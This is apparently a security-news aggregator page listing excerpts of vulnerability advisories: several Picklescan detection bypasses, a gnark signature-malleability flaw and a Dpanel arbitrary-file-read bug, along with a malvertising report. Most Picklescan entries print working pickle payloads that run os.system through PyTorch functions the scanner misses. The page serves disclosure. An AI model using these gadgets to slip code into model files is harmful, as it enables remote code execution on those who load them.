Security
Headlines
HeadlinesLatestCVEs

Tag

#git

COOKIE SPIDER’s Malvertising Drops New SHAMOS macOS Malware

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing…

HackRead
#mac#apple#cisco#git#samba#botnet
GHSA-95v9-hv42-pwrj: gnark is vulnerable to signature malleability in EdDSA and ECDSA due to missing scalar checks

In version before, `sig.s` used without asserting `0 ≤ S < order` in `Verify function` in [eddsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/eddsa/eddsa.go) and [ecdsa.go](https://github.com/Consensys/gnark/blob/d9a42397979b05f95f21a601fd219b06a8d60b7b/std/signature/ecdsa/ecdsa.go), which will lead to *signature malleability* vulnerability. ### Impact Since gnark’s native EdDSA and ECDSA circuits lack essential constraints, multiple distinct witnesses can satisfy the same public inputs. In protocols where nullifiers or anti-replay checks are derived from `(R, S)`, this enables signature malleability and may lead to double spending. ### Exploitation ```go package main import ( "crypto/rand" "fmt" "math/big" "github.com/consensys/gnark-crypto/ecc" mimcHash "github.com/consensys/gnark-crypto/ecc/bn254/fr/mimc" eddsaCrypto "github.com/consensys/gnark-crypto/ecc/bn254/twistededwards/eddsa" "github.com/consensys/gnark/...

GHSA-vv6j-3g6g-2pvj: Picklescan missing detection when calling pytorch function torch.utils._config_module.load_config

### Summary Using torch.utils._config_module.load_config function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils._config_module.load_config function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import pickle from torch.utils._config_module import ConfigModule class Evil: def __reduce__(self): return (os.system, ('whoami',)) class EvilTorchUtilsConfigModuleLoadConfig: def __reduce__(self): evil_payload = pickle.dumps(Evil()) return ConfigModule.load_config, (None, evil_payload) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malici...

GHSA-vr7h-p6mm-wpmh: Picklescan missing detection when calling pytorch function torch.jit.unsupported_tensor_ops.execWrapper

### Summary Using torch.jit.unsupported_tensor_ops.execWrapper function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.jit.unsupported_tensor_ops.execWrapper function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.jit.unsupported_tensor_ops as unsupported_tensor_ops class EvilTorchJitUnsupportedTensorOpsExecWrapper: def __reduce__(self): code = '__import__("os").system("whoami")' glob = {} loc = {} return unsupported_tensor_ops.execWrapper, (code, glob, loc) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle...

GHSA-h3qp-7fh3-f8h4: Picklescan missing detection when calling pytorch function torch.utils.data.datapipes.utils.decoder.basichandlers

### Summary Using torch.utils.data.datapipes.utils.decoder.basichandlers function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils.data.datapipes.utils.decoder.basichandlers function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.utils.data.datapipes.utils.decoder as decoder class EvilTorchUtilsDataDatapipesDecoder: def __reduce__(self): extension = 'pickle' class RCE: def __reduce__(self): return os.system, ('whoami',) data = pickle.dumps(RCE()) return decoder.basichandlers, (extension, data) ``` ### Impact Who is impacted? Any organiza...

GHSA-f745-w6jp-hpxx: Picklescan missing detection when calling pytorch function torch.utils.collect_env.run

### Summary Using torch.utils.collect_env.run function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils.collect_env.run function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.utils.collect_env as collect_env class EvilTorchUtilsCollectEnvRun: def __reduce__(self): command = 'touch /tmp/collect_env_run_success' return collect_env.run, (command,) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the impact? Attackers can embed malicious code in pickle file that remains undetected but ...

GHSA-f4x7-rfwp-v3xw: Picklescan missing detection when calling pytorch function torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression

### Summary Using torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.fx.experimental.symbolic_shapes.ShapeEnv.evaluate_guards_expression function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import types import torch.fx.experimental.symbolic_shapes as symbolic_shapes class EvilTorchFxSymbolicShapesEvaluateGuardsExpression: def __reduce__(self): fake_self = str code = "__import__('os').system('whoami')" args = [] return symbolic_shapes.ShapeEnv.evaluate_guards_expression, (fake_self, code, args) ``` ### ...

GHSA-86cj-95qr-2p4f: Picklescan missing detection when calling pytorch function torch._dynamo.guards.GuardBuilder.get

### Summary Using torch._dynamo.guards.GuardBuilder.get function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch._dynamo.guards.GuardBuilder.get function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import types import torch._dynamo.guards as guards class EvilTorchDynamoGuardsGet: def __reduce__(self): fake_self = types.SimpleNamespace(scope={}) name = "__import__('os').system('whoami')" return guards.GuardBuilder.get, (fake_self, name) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the i...

GHSA-4r9r-ch6f-vxmx: Picklescan missing detection when calling pytorch function torch.utils.bottleneck.__main__.run_cprofile

### Summary Using torch.utils.bottleneck.__main__.run_cprofile function, which is a pytorch library function to execute remote pickle file. ### Details The attack payload executes in the following steps: First, the attacker craft the payload by calling to torch.utils.bottleneck.__main__.run_cprofile function in reduce method Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution. ### PoC ``` import torch.utils.bottleneck.__main__ as bottleneck_main class EvilTorchUtilsBottleneckRunCprofile: def __reduce__(self): code = '__import__("os").system("whoami")' globs = {} return bottleneck_main.run_cprofile, (code, globs) ``` ### Impact Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models. What is the...

GHSA-gcqf-pxgg-gw8q: Dpanel has an arbitrary file read vulnerability

### Summary Dpanel has an arbitrary file read vulnerability in the /api/app/compose/get-from-uri interface.Logged in to Dpanel ,this interface can be used to read arbitrary files. ### Details When a user logs into the administrative backend, this interface can read any files on the host/sever (given the necessary permissions), which may lead to system information leakage. The vulnerability lies in the GetFromUri function within the app/application/http/controller/compose.go file. The uri parameter submitted by the user in JSON format can be directly read and returned by os.ReadFile without proper security handling. ![image-20250702004157585](https://github.com/user-attachments/assets/1f0e683b-bf0b-49e6-8d68-833fcf3f214d) ![image-20250702004223184](https://github.com/user-attachments/assets/b5e89e02-f572-4edf-aaa8-566dea090d3f) ### PoC ```text POST /api/app/compose/get-from-uri HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefo...